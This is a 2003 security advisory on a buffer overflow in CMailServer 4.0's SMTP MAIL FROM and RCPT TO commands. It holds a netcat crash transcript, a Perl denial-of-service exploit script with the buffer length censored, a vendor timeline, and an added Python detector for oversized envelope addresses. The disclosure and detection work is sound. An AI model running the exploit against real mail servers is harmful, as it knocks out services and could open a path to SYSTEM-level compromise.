cmail-vuln.txt
Posted May 12, 2003
Authored by Dennis Rand | Site Infowarfare.dk

A buffer overflow exists in the ESMTP CMailServer 4.0.2002.11.24 SMTP Service, resulting in a denial of service attack. It is possible to overwrite the exception handler on the stack allowing a system compromise with code execution running as SYSTEM.

tags | advisory, denial of service, overflow, code execution
MD5 | 190616081f26e58539f1d58a70e3c95a

Multiple Buffer Overflow Vulnerabilities
Found in CMailServer 4.0
http://www.youngzsoft.com

Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------


-----[SUMMARY
CMailServer, a small and easy to administer email server software and web
mail server software, can help you build your own email server for
Win NT/2000/XP. It enables you to send and receive email across the
Internet or within your LAN. The ESMTP authentication, ASP form web
mail and multiple domain names are supported.

CMailServer offers an unlimited email users license at a reasonable
and affordable price compared to other email server software.
For those small to medium sized companies, CMailServer will be an
economic and effective solution to handle their e-mail management
requirements. CMailServer also is a web mail server software and
provides full web mail service. The web mail is based on ASP.
You can customize your web mail interface freely. Give it a try
and find out how easy it is to build an email server and web mail
server for your own business.


The problem is a buffer overflow in the SMTP protocol handling of the
ESMTP CMailServer 4.0.2002.11.24 SMTP Service, causing the service to
shut down.
It is also possible to overwrite the exception handler on the stack,
allowing a system compromise with code execution running as SYSTEM.


-----[AFFECTED SYSTEMS
Vulnerable systems:
* ESMTP CMailServer 4.0.2003.03.27 SMTP Service

Immune systems:
* ESMTP CMailServer 4.0.2003.03.30 SMTP Service

-----[SEVERITY
High - An attacker is able to cause a DoS attack on the SMTP service.
It is also possible to overwrite the exception handler on the stack,
allowing a system compromise with code execution running as SYSTEM.


-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The vulnerability is a buffer overflow in the ESMTP CMailServer
4.0.2002.11.24 SMTP Service.
When a malicious attacker sends a large amount of data in the "MAIL FROM"
and "RCPT TO" commands, the buffer overflows. If the input were carefully
crafted, attackers could execute arbitrary commands with system privileges.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:
----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>

The same vulnerability exists in the RCPT TO command:
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>
----------------------------- [Transcript] -----------------------------

----------------------------- [Exploit Code] -----------------------------
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown.
# It is then where we can actually overwrite the exception handler on the
# stack, allowing a system compromise with code execution running as SYSTEM.
#
#
# I've censored some of the source code out. =)
#
# Solution:
# None at this time
#
#

use IO::Socket;

$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; #


my $sock = IO::Socket::INET->new (
PeerAddr => $target,
PeerPort => $port,
Proto => 'tcp'
) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
print STDERR "Error: invalid server response '$banner'.\n";
exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
----------------------------- [Exploit Code] -----------------------------



-----[DETECTION
ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the
above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above transcript.
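As an added example (not part of Dennis Rand's advisory or the vendor's code), a small Python check that flags MAIL FROM and RCPT TO arguments exceeding the RFC 5321 length limits, which is how the oversized envelope addresses in the transcript above would show up in a captured session or proxy log. The sample session lines are constructed.

```python
import re

# RFC 5321 section 4.5.3.1 size limits, in octets.
MAX_LOCAL_PART = 64
MAX_PATH = 256

# Accepts the strict "MAIL FROM:<path>" form and the looser
# "Mail From : <path>" spelling seen in the advisory transcript.
_ENVELOPE_RE = re.compile(
    r"^(?P<cmd>MAIL\s+FROM|RCPT\s+TO)\s*:\s*(?P<arg>.*)$", re.IGNORECASE)

def check_envelope_command(line):
    """Reason string if a MAIL FROM/RCPT TO argument breaks the limits, else None."""
    m = _ENVELOPE_RE.match(line.strip())
    if not m:
        return None
    cmd = " ".join(m.group("cmd").upper().split())
    arg = m.group("arg").strip()
    # Keep only the path, dropping ESMTP parameters such as SIZE=1234, then
    # strip angle brackets (the transcript shows an unclosed "<", so tolerate
    # either form).
    path = arg.split()[0].strip("<>") if arg else ""
    if len(path) > MAX_PATH:
        return f"{cmd} path is {len(path)} octets (limit {MAX_PATH})"
    local, sep, _domain = path.rpartition("@")
    if sep and len(local) > MAX_LOCAL_PART:
        return f"{cmd} local-part is {len(local)} octets (limit {MAX_LOCAL_PART})"
    return None

def scan_session(lines):
    """Return (1-based line number, reason) for each suspicious client command."""
    findings = []
    for number, line in enumerate(lines, start=1):
        reason = check_envelope_command(line)
        if reason:
            findings.append((number, reason))
    return findings

# Constructed sample session modelled on the advisory transcript, not real
# traffic; the RCPT TO carries a 2000-byte local-part as in the transcript.
SAMPLE_SESSION = [
    "HELO Foobar",
    "MAIL FROM: admin@example.test",
    "RCPT TO: <" + "a" * 2000 + "@example.test>",
    "DATA",
]

if __name__ == "__main__":
    for number, reason in scan_session(SAMPLE_SESSION):
        print(f"line {number}: {reason}")
```

A 2000-byte local-part is far beyond anything a legitimate client sends, so an alert on this check has a very low false-positive rate on real mail traffic.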


-----[WORK AROUNDS
Upgrade as soon as possible to ESMTP CMailServer 4.0.2003.03.30 SMTP Service
or later.
The other workaround is to disable the SMTP service, but that is not fun.

-----[VENDOR RESPONSE
Quoting YoungZSoft <yaoer@youngzsoft.com>:
I thank you very very much for your report.
We will fix this as soon as possible
Yaoer

-----[DISCLOSURE TIMELINE
24/04/2003 Found the Vulnerability, and made an analysis.
29/04/2003 Contacted Vendor at support@youngzsoft.net
30/04/2003 Received response from vendor with a fix to test
01/05/2003 New version tested negative for the vulnerabilities
10/05/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by Dennis Rand <der@infowarfare.dk>.

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.
